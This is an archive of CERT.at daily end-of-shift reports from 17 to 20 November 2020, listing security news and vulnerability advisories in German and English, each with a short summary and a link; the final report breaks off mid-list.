===================== = End-of-Day report = ===================== Timeframe: Donnerstag 19-11-2020 18:00 − Freitag 20-11-2020 18:00 Handler: Stephan Richter Co-Handler: n/a ===================== = News = ===================== ∗∗∗ IAM-Driven Biometrics: The Security Issues with Biometric Identity and Access Management ∗∗∗ --------------------------------------------- The increase of cybersecurity incidents brings along a higher demand for enhanced security protections. Thus, in the attempt of preventing unauthorized third parties from accessing their accounts and sensitive data, companies are increasingly turning to biometric authentication. Contemporary Identity and Access Management (IAM) technologies have moved beyond basic login methods based on usernames and passwords. --------------------------------------------- https://heimdalsecurity.com/blog/iam-driven-biometrics/ ∗∗∗ [SANS ISC] Malicious Python Code and LittleSnitch Detection ∗∗∗ --------------------------------------------- I published the following diary on isc.sans.edu: “Malicious Python Code and LittleSnitch Detection“: We all run plenty of security tools on our endpoints. Their goal is to protect us by preventing infection (or trying to prevent it). But all those security tools are present on our devices like normal applications --------------------------------------------- https://blog.rootshell.be/2020/11/20/sans-isc-malicious-python-code-and-lit… ∗∗∗ The malware that usually installs ransomware and you need to remove right away ∗∗∗ --------------------------------------------- [...] This article focuses on the known malware strains that have been used over the past two years to install ransomware. [...] Once any of these malware strains are detected, system administrators should drop everything, take systems offline, and audit and remove the malware as a top priority. ZDNet will keep the list up to date going forward. --------------------------------------------- https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-… ∗∗∗ Exploiting dynamic rendering engines to take control of web apps ∗∗∗ --------------------------------------------- tl;dr: - Dynamic rendering is a technique used to serve prerendered web site pages to crawlers (e.g., Google search engine, Slack or Twitter bots, etc.) - The most popular open source applications for dynamic rendering are Rendertron and Prerender; both of which may introduce vulnerabilities to a network if used improperly. --------------------------------------------- https://r2c.dev/blog/2020/exploiting-dynamic-rendering-engines-to-take-cont… ∗∗∗ Consul by HashiCorp: from Infoleak to RCE ∗∗∗ --------------------------------------------- Consul is a software first released in 2014 for DNS-based service discovery. It provides distributed key-value storage, segmentation, and configuration. Registered services and nodes can be queried using a DNS interface or an HTTP interface. [...] An attacker can use public access to the system to obtain information about the infrastructure and its configuration. --------------------------------------------- https://lab.wallarm.com/consul-by-hashicorp-from-infoleak-to-rce/ ∗∗∗ WordPress Malware Setting Up SEO Shops ∗∗∗ --------------------------------------------- While recently looking over my honeypots, I discovered an infection where a malicious actor added a storefront on top of my existing WordPress installation. For background, this particular honeypot is a full instance of WordPress running on a Docker image. The administrator credentials are intentionally weak, in order to give those with malicious intent easy access. This way I can examine what attacks the vulnerable site will undergo and what the login access will be used for. --------------------------------------------- https://blogs.akamai.com/sitr/2020/11/wordpress-malware-setting-up-seo-shop… ∗∗∗ Purgalicious VBA: Macro Obfuscation With VBA Purging ∗∗∗ --------------------------------------------- Malicious Office documents remain a favorite technique for every type of threat actor, from red teamers to FIN groups to APTs. In this blog post, we will discuss "VBA Purging", a technique we have increasingly observed in the wild and that was first publicly documented by Didier Stevens in February 2020. --------------------------------------------- http://www.fireeye.com/blog/threat-research/2020/11/purgalicious-vba-macro-… ∗∗∗ Demystifying two common misconceptions with e-commerce security ∗∗∗ --------------------------------------------- HTTPS and iframe containers augment security, but are not a panacea for online shoppers and merchants. --------------------------------------------- https://blog.malwarebytes.com/cybercrime/2020/11/demystifying-two-common-mi… ∗∗∗ Vorsicht: Zahlreiche Fake-Shops werben mit Black Friday Deals ∗∗∗ --------------------------------------------- In einer Woche ist es soweit: Der Black Friday lässt das Herz von Schnäppchenjägern höherschlagen. Ab Montag beginnt die Cyber Week, bei denen sich KonsumentInnen schon vor dem Black Friday über Rabatte im Online-Handel freuen können. Doch seien Sie vorsichtig auf der Schnäppchenjagd. Denn zu dieser Zeit macht nicht nur der Online-Handel ein gutes Geschäft, sondern auch BetrügerInnen. --------------------------------------------- https://www.watchlist-internet.at/news/vorsicht-zahlreiche-fake-shops-werbe… ∗∗∗ IAMFinder: Open Source Tool to Identify Information Leaked from AWS IAM Reconnaissance ∗∗∗ --------------------------------------------- IAMFinder is a custom open-source tool that can identify users and IAM roles in AWS accounts, showing where to harden IAM configurations. --------------------------------------------- https://unit42.paloaltonetworks.com/iamfinder/ ===================== = Vulnerabilities = ===================== ∗∗∗ About the security content of macOS Big Sur 11.0.1 ∗∗∗ --------------------------------------------- The macOS Big Sur 11.0.1 software update is available for Mac mini (M1, 2020), MacBook Air (M1, 2020), and MacBook Air (13-inch, 2020), and together with macOS 11.0 includes the security content listed in this advisory. --------------------------------------------- https://support.apple.com/en-us/HT211982 ∗∗∗ VMSA-2020-0026 VMware ESXi, Workstation and Fusion updates address use-after-free and privilege escalation vulnerabilities (CVE-2020-4004, CVE-2020-4005) ∗∗∗ --------------------------------------------- Multiple vulnerabilities in VMware ESXi, Workstation and Fusion were privately reported to VMware. Updates are available to remediate these vulnerabilities in affected VMware products. --------------------------------------------- https://www.vmware.com/security/advisories/VMSA-2020-0026.html ∗∗∗ VMSA-2020-0023 Updates ∗∗∗ --------------------------------------------- Updated security advisory to add Workstation 15.x version in the response matrix of section 3(c) and 3(d). --------------------------------------------- https://www.vmware.com/security/advisories/VMSA-2020-0023.html ∗∗∗ VMSA-2020-0020 Updates ∗∗∗ --------------------------------------------- Updated security advisory to add Fusion 11.x version in the response matrix of section 3(a) and Workstation 15.x version in the response matrix of section 3(b), 3(c) & 3(d). --------------------------------------------- https://www.vmware.com/security/advisories/VMSA-2020-0020.html ∗∗∗ Security updates for Friday ∗∗∗ --------------------------------------------- Security updates have been issued by CentOS (firefox), Fedora (chromium, microcode_ctl, mingw-libxml2, seamonkey, and xen), openSUSE (slurm_18_08 and tor), Oracle (thunderbird), SUSE (buildah, firefox, go1.14, go1.15, krb5, microcode_ctl, perl-DBI, podman, postgresql12, thunderbird, ucode-intel, wireshark, wpa_supplicant, and xen), and Ubuntu (firefox and phpmyadmin). --------------------------------------------- https://lwn.net/Articles/837915/ ∗∗∗ CVE-2019-19781 - Vulnerability in Citrix Application Delivery Controller, Citrix Gateway, and Citrix SD-WAN WANOP appliance ∗∗∗ --------------------------------------------- A vulnerability has been identified in Citrix Application Delivery Controller (ADC) formerly known as NetScaler ADC and Citrix Gateway formerly known as NetScaler Gateway that, if exploited, could allow an unauthenticated attacker to perform arbitrary code execution. --------------------------------------------- https://support.citrix.com/article/CTX267027 ∗∗∗ Security Bulletin: Cryptographic Vulnerability Affects Map Editor in IBM Sterling B2B Integrator (CVE-2020-4937) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-cryptographic-vulnerabili… ∗∗∗ Security Bulletin: Vulnerability CVE-2020-4788 in the IBM Power9 processor affects IBM i ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-vulnerability-cve-2020-47… ∗∗∗ Security Bulletin: Multiple vulnerabilities in IBM Java SDK and IBM Java Runtime affect Rational Business Developer ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-multiple-vulnerabilities-… ∗∗∗ Security Bulletin: Publicly disclosed vulnerabilities from Kernel affect IBM Netezza Host Management ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-publicly-disclosed-vulner… ∗∗∗ Security Bulletin: InfoSphere Master Data Management 11.6 affected due to vulnerability in OpenSSL ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-infosphere-master-data-ma… ∗∗∗ Security Bulletin: IBM® Db2® could allow a local authenticated attacker to execute arbitrary code on the system, caused by DLL search order hijacking vulnerability in Microsoft Windows client. (CVE-2020-4739) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-ibm-db2-could-allow-a-loc… ∗∗∗ Security Bulletin: IBM has released AIX and VIOS iFixes in response to a vulnerability in IBM POWER9 (CVE-2020-4788) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-ibm-has-released-aix-and-… ∗∗∗ Security Bulletin: IBM SDK, Java Technology Edition Quarterly CPU – Apr 2020 – Includes Oracle Apr 2020 CPU minus CVE-2020-2773 affects IBM MQ ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-ibm-sdk-java-technology-e… -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 19.11.2020
by Daily end-of-shift report 19 Nov '20

19 Nov '20

===================== = End-of-Day report = ===================== Timeframe: Mittwoch 18-11-2020 18:00 − Donnerstag 19-11-2020 18:00 Handler: Stephan Richter Co-Handler: n/a ===================== = News = ===================== ∗∗∗ Android chat app with 100 million installs exposes private messages ∗∗∗ --------------------------------------------- GO SMS Pro, an Android instant messaging application with over 100 million installs, is publicly exposing private multimedia files shared between its users. --------------------------------------------- https://www.bleepingcomputer.com/news/security/android-chat-app-with-100-mi… ∗∗∗ CodeQL: Github findet Sicherheitslücke in Corona-Warn-App-Server ∗∗∗ --------------------------------------------- Das Sicherheitsteam von Github hat eine Remote Code Execution im Server-Code der Corona-Warn-App gefunden --------------------------------------------- https://www.golem.de/news/codeql-github-findet-sicherheitsluecke-in-corona-… ∗∗∗ Egregor-Ransomware bombardiert Nutzer mit gedruckten Lösegeldforderungen ∗∗∗ --------------------------------------------- Die Cyberkriminellen wenden die Taktik erstmals bei einem Angriff auf einen chilenischen Handelskonzern an. Sie begnügen sich nicht nur mit Office-Druckern und geben ihre Lösegeldforderung sogar auf Quittungsdruckern aus. Unklar ist, wie die Hacker dabei vorgehen. --------------------------------------------- https://www.zdnet.de/88389908/egregor-ransomware-bombardiert-nutzer-mit-ged… ===================== = Vulnerabilities = ===================== ∗∗∗ Drupal core - Critical - Remote code execution - SA-CORE-2020-012 ∗∗∗ --------------------------------------------- Drupal core does not properly sanitize certain filenames on uploaded files, which can lead to files being interpreted as the incorrect extension and served as the wrong MIME type or executed as PHP for certain hosting [...] --------------------------------------------- https://www.drupal.org/sa-core-2020-012 ∗∗∗ SAML SP 2.0 Single Sign On (SSO) - SAML Service Provider - Critical - Access bypass - SA-CONTRIB-2020-038 ∗∗∗ --------------------------------------------- https://www.drupal.org/sa-contrib-2020-038 ∗∗∗ Ink Filepicker - Critical - Unsupported - SA-CONTRIB-2020-037 ∗∗∗ --------------------------------------------- https://www.drupal.org/sa-contrib-2020-037 ∗∗∗ Media: oEmbed - Critical - Remote Code Execution - SA-CONTRIB-2020-036 ∗∗∗ --------------------------------------------- https://www.drupal.org/sa-contrib-2020-036 ∗∗∗ Examples for Developers - Critical - Remote Code Execution - SA-CONTRIB-2020-035 ∗∗∗ --------------------------------------------- https://www.drupal.org/sa-contrib-2020-035 ∗∗∗ VMware SD-WAN Orchestrator updates address multiple security vulnerabilities ∗∗∗ --------------------------------------------- Multiple vulnerabilities in SD-WAN Orchestrator were privately reported to VMware. Patches and workarounds are available to remediate or workaround this vulnerability in affected VMware products. VMware-hosted SD-WAN Orchestrators have been patched for these issues. --------------------------------------------- https://www.vmware.com/security/advisories/VMSA-2020-0025.html ∗∗∗ Security updates for Thursday ∗∗∗ --------------------------------------------- Security updates have been issued by Arch Linux (chromium and firefox), CentOS (bind, curl, fence-agents, kernel, librepo, libvirt, microcode_ctl, python, python3, qt and qt5-qtbase, resource-agents, and tomcat), Debian (drupal7, firefox-esr, jupyter-notebook, packer, python3.5, and rclone), Fedora (firefox), Mageia (firefox, nss), openSUSE (gdm, kernel-firmware, and moinmoin-wiki), Oracle (net-snmp), SUSE (libzypp, zypper), and Ubuntu (c-ares). --------------------------------------------- https://lwn.net/Articles/837767/ ∗∗∗ ICS Advisory (ICSA-20-324-03) Real Time Automation EtherNet/IP ∗∗∗ --------------------------------------------- The affected product is vulnerable to a stack-based buffer overflow, which may allow an attacker to send a specially crafted packet that may result in a denial-of-service condition or code execution. --------------------------------------------- https://us-cert.cisa.gov/ics/advisories/icsa-20-324-03 ∗∗∗ Trend Micro Apex One: Mehrere Schwachstellen ∗∗∗ --------------------------------------------- https://www.cert-bund.de/advisoryshort/CB-K20-1136 ∗∗∗ F5 BIG-IP: Schwachstelle ermöglicht Umgehen von Sicherheitsvorkehrungen ∗∗∗ --------------------------------------------- https://www.cert-bund.de/advisoryshort/CB-K20-1140 ∗∗∗ [webapps] Nagios Log Server 2.1.7 - Persistent Cross-Site Scripting ∗∗∗ --------------------------------------------- https://www.exploit-db.com/exploits/49082 ∗∗∗ Security Advisory - Improper Buffer Operation Restrictions Vulnerability on Huawei Smartphone ∗∗∗ --------------------------------------------- http://www.huawei.com/en/psirt/security-advisories/2020/huawei-sa-20201118-… ∗∗∗ Security Advisory - Command Injection Vulnerability in Huawei FusionCompute Product ∗∗∗ --------------------------------------------- http://www.huawei.com/en/psirt/security-advisories/2020/huawei-sa-20201118-… ∗∗∗ Security Bulletin: TLS Protocol DHE_EXPORT Ciphers Downgrade MitM (Logjam) vulnerability in IBM Cloud Pak for Data Streams ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-tls-protocol-dhe_export-c… ∗∗∗ Security Bulletin: The web server or application server are configured in an insecure way in IBM Cloud Pak for Data Streams ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-the-web-server-or-applica… ∗∗∗ Security Bulletin: CVE-2020-14782 may affect IBM® SDK, Java™ Technology Edition ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-cve-2020-14782-may-affect… ∗∗∗ Security Bulletin: App Connect for Manufacturing 2.0 is affected by vulnerabilities of ASN.1 parser in Bouncy Castle Crypto (aka BC Java) 1.6 (CVE-2019-17359) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-app-connect-for-manufactu… ∗∗∗ Security Bulletin: IBM® Db2® is vulnerable to a buffer overflow (CVE-2020-4701) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-ibm-db2-is-vulnerable-to-… ∗∗∗ Security Bulletin: Security vulnerability affects the Report Builder that is shipped with Jazz Reporting Service (CVE-2020-4718) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-security-vulnerability-af… ∗∗∗ Security Bulletin: Lucky 13 Attack Vulnerability in IBM Cloud Pak for Data Streams ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-lucky-13-attack-vulnerabi… ∗∗∗ Security Bulletin: Multiple vulnerabilities may affect IBM® SDK, Java™ Technology Edition ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-multiple-vulnerabilities-… ∗∗∗ Security Bulletin: Vulnerability in OpenSSH affects IBM Integrated Analytics System ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-vulnerability-in-openssh-… ∗∗∗ Security Bulletin: CVE-2019-17638 jetty double-release of a byte buffer ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-cve-2019-17638-jetty-doub… -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 18.11.2020
by Daily end-of-shift report 18 Nov '20

18 Nov '20

===================== = End-of-Day report = ===================== Timeframe: Dienstag 17-11-2020 18:00 − Mittwoch 18-11-2020 18:00 Handler: Dimitri Robl Co-Handler: Robert Waldner ===================== = News = ===================== ∗∗∗ When Security Controls Lead to Security Issues, (Wed, Nov 18th) ∗∗∗ --------------------------------------------- The job of security professionals is to protect customers assets and, even more, today, customers data. The security landscape is full of solutions that help to improve security by detecting (and blocking) threats knocking on the organizations doors. Sometimes, such solutions have side effects that go to the opposite direction and make customers more vulnerable to attacks. --------------------------------------------- https://isc.sans.edu/diary/rss/26804 ∗∗∗ Evasive Maneuvers in Data Stealing Gateways ∗∗∗ --------------------------------------------- We have already shared examples of many kinds of malware that rely on an external gateway to receive or return data, such as different malware payloads. During a recent investigation, we came across this example of a PHP script that attackers use for many different purposes. What makes the sample interesting is that alongside this PHP, we also found a few data-stealing scripts indicating that the code might have been used to send sensitive data to the attackers. Continue reading Evasive --------------------------------------------- https://blog.sucuri.net/2020/11/evasive-maneuvers-in-data-stealing-gateways… ∗∗∗ WebNavigator Chromium browser published by search hijackers ∗∗∗ --------------------------------------------- A mystery Chromium browser recently made a sudden appearance, and is certainly proving popular. But what is it, and where did it come from? --------------------------------------------- https://blog.malwarebytes.com/pups/2020/11/webnavigator-chromium-browser-pu… ∗∗∗ Nibiru ransomware variant decryptor ∗∗∗ --------------------------------------------- The Nibiru ransomware is a .NET-based malware family. It traverses directories in the local disks, encrypts files with Rijndael-256 and gives them a .Nibiru extension. Rijndael-256 is a secure encryption algorithm. However, Nibiru uses a hard-coded string "Nibiru" to compute the 32-byte key and 16-byte IV values. The decryptor program leverages this weakness to decrypt files encrypted by this variant. --------------------------------------------- https://blog.talosintelligence.com/2020/11/Nibiru-ransomware.html ∗∗∗ Large-Scale Attacks Target Epsilon Framework Themes ∗∗∗ --------------------------------------------- On November 17, 2020, our Threat Intelligence team noticed a large-scale wave of attacks against recently reported Function Injection vulnerabilities in themes using the Epsilon Framework, which we estimate are installed on over 150,000 sites. So far today, we have seen a surge of more than 7.5 million attacks against more than 1.5 million sites ... For the time being, the vast majority of these attacks appear to be probing attacks, designed to determine whether a site has a vulnerable theme installed rather than to perform an exploit chain, though full Remote Code Execution(RCE) leading to site takeover is possible with these vulnerabilities. --------------------------------------------- https://www.wordfence.com/blog/2020/11/large-scale-attacks-target-epsilon-f… ∗∗∗ Vorsicht vor COVID-19-Hilfsfonds: Unterstützungszahlungen in Millionenhöhe sind Betrug! ∗∗∗ --------------------------------------------- Die Corona-Krise ist für viele Menschen auch eine finanzielle Krise. Verschiedene Unterstützungsangebote sollen daher helfen, durch diese Zeit zu kommen. Aber Achtung! Werfen Sie einen genauen Blick darauf, wer Ihnen Geld anbietet. Denn: Derzeit werden betrügerische E-Mails von angeblichen COVID-19 Hilfsfonds versendet, in denen hohe Geldbeträge versprochen werden. --------------------------------------------- https://www.watchlist-internet.at/news/vorsicht-vor-covid-19-hilfsfonds-unt… ===================== = Vulnerabilities = ===================== ∗∗∗ iTunes 12.11 for Windows ∗∗∗ --------------------------------------------- Foundation Impact: A local user may be able to read arbitrary files ImageIO Impact: Processing a maliciously crafted image may lead to arbitrary code execution libxml2 Impact: Processing maliciously crafted web content may lead to code execution libxml2 Impact: A remote attacker may be able to cause unexpected application termination or arbitrary code execution WebKit Impact: Processing maliciously crafted web content may lead to arbitrary code execution Windows Security Impact: A malicious application may be able to access local users Apple IDs --------------------------------------------- https://support.apple.com/kb/HT211933 ∗∗∗ Tails 4.13: Anonymisierendes Betriebssystem bekommt wichtige Sicherheitsupdates ∗∗∗ --------------------------------------------- Die neue Version des Debian-basierten Live-Systems umfasst ein wenig Feinschliff an der Oberfläche, vor allem aber wichtige Security-Fixes. --------------------------------------------- https://heise.de/-4963955 ∗∗∗ Tor Browser: Desktop-Version 10.0.5 mit Firefox-Sicherheitsupdates verfügbar ∗∗∗ --------------------------------------------- Für Windows, Linux und macOS steht eine neue Version des anonymisierenden Webbrowsers bereit. Die Android-Ausgabe soll bald folgen. --------------------------------------------- https://heise.de/-4964177 ∗∗∗ Cisco Expressway Software Unauthorized Access Information Disclosure Vulnerability ∗∗∗ --------------------------------------------- https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco… ∗∗∗ Cisco Secure Web Appliance Privilege Escalation Vulnerability ∗∗∗ --------------------------------------------- https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco… ∗∗∗ Cisco Webex Meetings API Cross-Site Scripting Vulnerability ∗∗∗ --------------------------------------------- https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco… ∗∗∗ Cisco Webex Meetings and Cisco Webex Meetings Server Information Disclosure Vulnerability ∗∗∗ --------------------------------------------- https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco… ∗∗∗ Cisco Webex Meetings and Cisco Webex Meetings Server Unauthorized Audio Information Exposure Vulnerability ∗∗∗ --------------------------------------------- https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco… ∗∗∗ Cisco Webex Meetings and Cisco Webex Meetings Server Ghost Join Vulnerability ∗∗∗ --------------------------------------------- https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco… ∗∗∗ Cisco Integrated Management Controller Multiple Remote Code Execution Vulnerabilities ∗∗∗ --------------------------------------------- https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco… ∗∗∗ Cisco Telepresence CE Software and RoomOS Software Unauthorized Token Generation Vulnerability ∗∗∗ --------------------------------------------- https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco… ∗∗∗ Cisco DNA Spaces Connector Command Injection Vulnerability ∗∗∗ --------------------------------------------- https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco… ∗∗∗ Cisco IoT Field Network Director Cross-Site Scripting Vulnerabilities ∗∗∗ --------------------------------------------- https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco… ∗∗∗ Cisco IoT Field Network Director Improper Domain Access Control Vulnerability ∗∗∗ --------------------------------------------- https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco… ∗∗∗ Cisco IoT Field Network Director Information Disclosure Vulnerability ∗∗∗ --------------------------------------------- https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco… ∗∗∗ Cisco IoT Field Network REST API Insufficient Input Validation Vulnerability ∗∗∗ --------------------------------------------- https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco… ∗∗∗ Cisco IoT Field Network Director Unprotected Storage of Credentials Vulnerability ∗∗∗ --------------------------------------------- https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco… ∗∗∗ Cisco IoT Field Network Director File Overwrite Vulnerability ∗∗∗ --------------------------------------------- https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco… ∗∗∗ Cisco IoT Field Network Director Improper Access Control Vulnerability ∗∗∗ --------------------------------------------- https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco… ∗∗∗ Cisco IoT Field Network Director Unauthenticated REST API Vulnerability ∗∗∗ --------------------------------------------- https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco… ∗∗∗ Cisco IoT Field Network Director SOAP API Authorization Bypass Vulnerability ∗∗∗ --------------------------------------------- https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco… ∗∗∗ Cisco IoT Field Network Director Missing API Authentication Vulnerability ∗∗∗ --------------------------------------------- https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco… ∗∗∗ Cisco Integrated Management Controller Multiple Remote Code Execution Vulnerabilities ∗∗∗ --------------------------------------------- https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco… ∗∗∗ Security Advisory - Privilege Escalation Vulnerability in FusionCompute Product ∗∗∗ --------------------------------------------- http://www.huawei.com/en/psirt/security-advisories/2020/huawei-sa-20201118-… ∗∗∗ Security Bulletin: An unspecified vulnerability in Java SE or Oracle Java SE could allow an unauthenticated attacker ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-an-unspecified-vulnerabil… ∗∗∗ Security Bulletin: Multiple vulnerabilities in IBM Java SDK and IBM Java Runtime affect IBM Decision Optimization Center (CVE-2020-14577, CVE-2020-14578, CVE-2020-14579, CVE-2020-14621) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-multiple-vulnerabilities-… ∗∗∗ Security Bulletin: App Connect Enterprise Certified Container Dashboard is vulnerable to (CVE-2020-15168) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-app-connect-enterprise-ce… ∗∗∗ Security Bulletin: IBM MQ Appliance is affected by a data corruption vulnerability (CVE-2020-4592) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-ibm-mq-appliance-is-affec… ∗∗∗ Security Bulletin: IBM MQ is affected by a vulnerability in IBM Runtime Environment Java (deferred from Oracle Jan 2020 CPU) CVE-2020-2654 ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-ibm-mq-is-affected-by-a-v… -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 17.11.2020
by Daily end-of-shift report 17 Nov '20

17 Nov '20

===================== = End-of-Day report = ===================== Timeframe: Montag 16-11-2020 18:00 − Dienstag 17-11-2020 18:00 Handler: Stephan Richter Co-Handler: n/a ===================== = News = ===================== ∗∗∗ Sicherheitslücke: Mit Hardware für 30 Dollar Intels sichere Enklave geknackt ∗∗∗ --------------------------------------------- Intels Enklave SGX soll Daten selbst vor Rechenzentrumsbetreibern mit physischem Zugang verbergen. Doch Forscher konnten auf diese Weise RSA-Schlüssel auslesen. --------------------------------------------- https://www.golem.de/news/sicherheitsluecke-mit-hardware-fuer-30-dollar-int… ∗∗∗ Firewall-Umgehung in macOS 11: Malware kann Apples Ausschlussliste missbrauchen ∗∗∗ --------------------------------------------- Apple-Dienste bleiben für lokale Firewalls in macOS 11 unsichtbar. Auch Malware könne so nach Hause telefonieren, warnt ein Sicherheitsforscher. --------------------------------------------- https://heise.de/-4963227 ∗∗∗ Be Very Sparing in Allowing Site Notifications ∗∗∗ --------------------------------------------- An increasing number of websites are asking visitors to approve "notifications," browser modifications that periodically display messages on the users mobile or desktop device. In many cases these notifications are benign, but several dodgy firms are paying site owners to install their notification scripts and then selling that communications pathway to scammers and online hucksters. --------------------------------------------- https://krebsonsecurity.com/2020/11/be-very-sparing-in-allowing-site-notifi… ∗∗∗ YouTube: Betrügerische Werbung verlockt zu hohen Investitionen ∗∗∗ --------------------------------------------- Aktuell wird auf YouTube der Bitcoin-Handel auf unseriösen Trading-Plattformen beworben. Wer sich für die Werbung interessiert, landet bei einem gefälschten Zeitungsartikel auf einer gefälschten Kronen Zeitung Website. Dort ist ein frei erfundenes Interview mit dem Geschäftsmann Richard Lugner zu lesen, in dem er erklärt, wie man mit Bitcoin-Investitionen in nur wenigen Tagen zum Millionär wird. --------------------------------------------- https://www.watchlist-internet.at/news/youtube-betruegerische-werbung-verlo… ∗∗∗ Jupyter trojan: Newly discovered malware stealthily steals usernames and passwords ∗∗∗ --------------------------------------------- Morphisec researchers detail campaign that steals Chromium, Firefox, and Chrome browser data. --------------------------------------------- https://www.zdnet.com/article/jupyter-trojan-newly-discovered-trojan-malwar… ∗∗∗ vjw0rm Leveraging New Obfuscation Technique ∗∗∗ --------------------------------------------- Summaryvjw0rm is a malicious JavaScript program capable of propagating across removable storage devices and receiving instructions from a C2 server. A SANS Internet Storm Center (ISC) researcher has identified a sample of this worm leveraging new obfuscation techniques. --------------------------------------------- https://exchange.xforce.ibmcloud.com/collection/bfbf7b77d8cbc57d1a94e7bc291… ===================== = Vulnerabilities = ===================== ∗∗∗ Jetzt updaten: Cisco bessert bei der Sicherheit seines "Security Managers" nach ∗∗∗ --------------------------------------------- Dank Lücken mit "High" und "Critical"-Einstufung war Ciscos Security Manager der Sicherheit eher abträglich. Software-Updates sind jetzt teilweise verfügbar. --------------------------------------------- https://heise.de/-4962719 ∗∗∗ Blind Out-Of-Band XML External Entity Injection in Avaya Web License Manager ∗∗∗ --------------------------------------------- By using an XXE injection it is possible to read confidential data like /etc/shadow or private keys. In addition, a special payload can affect the availability of the web application. --------------------------------------------- https://sec-consult.com/en/blog/advisories/blind-out-of-band-xml-external-e… ∗∗∗ TYPO3 Extensions: Mehrere Schwachstellen ∗∗∗ --------------------------------------------- Ein entfernter, authentisierter Angreifer kann mehrere Schwachstellen in TYPO3 Extensions ausnutzen, um Informationen offenzulegen oder einen Denial of Service zu verursachen. --------------------------------------------- https://www.cert-bund.de/advisoryshort/CB-K20-1127 ∗∗∗ TYPO3 Core: Mehrere Schwachstellen ∗∗∗ --------------------------------------------- Ein entfernter, anonymer Angreifer kann mehrere Schwachstellen in TYPO3 Core ausnutzen, um einen Cross-Site Scripting Angriff durchzuführen, Informationen offenzulegen oder Sicherheitsvorkehrungen zu umgehen. --------------------------------------------- https://www.cert-bund.de/advisoryshort/CB-K20-1124 ∗∗∗ Trend Micro InterScan Web Security Virtual Appliance < 6.5 SP2 Hotfix 1919 ∗∗∗ --------------------------------------------- Ein entfernter, anonymer Angreifer kann mehrere Schwachstellen in Trend Micro InterScan Web Security Virtual Appliance ausnutzen, um beliebigen Programmcode mit Administratorrechten auszuführen. --------------------------------------------- https://www.cert-bund.de/advisoryshort/CB-K20-1128 ∗∗∗ Apple iTunes: Mehrere Schwachstellen ∗∗∗ --------------------------------------------- Ein entfernter, anonymer Angreifer kann mehrere Schwachstellen in Apple iTunes ausnutzen, um beliebigen Programmcode mit Benutzerrechten auszuführen oder einen Denial of Service zu verursachen. --------------------------------------------- https://www.cert-bund.de/advisoryshort/CB-K20-1125 ∗∗∗ Node.js: Schwachstelle ermöglicht Denial of Service ∗∗∗ --------------------------------------------- https://www.cert-bund.de/advisoryshort/CB-K20-1126 ∗∗∗ Trend Micro Worry-Free Business Security: Schwachstelle ermöglicht Umgehen von Sicherheitsvorkehrungen ∗∗∗ --------------------------------------------- https://www.cert-bund.de/advisoryshort/CB-K20-1129 ∗∗∗ Western Digital My Cloud NAS Devices Security Vulnerabilities ∗∗∗ --------------------------------------------- Comparitech researches have published a paper on five vulnerabilities found in Western Digital network-attached storage (NAS) devices. If successfully exploited, the exploitation of these vulnerabilities could lead to remote code execution. Also possible is the [...] --------------------------------------------- https://exchange.xforce.ibmcloud.com/collection/2ee337a7fbea5d145289bcab311… ∗∗∗ Security updates for Tuesday ∗∗∗ --------------------------------------------- Security updates have been issued by Debian (libdatetime-timezone-perl, openldap, pacemaker, and restic), Fedora (libmediainfo, mediainfo, mingw-python3, and 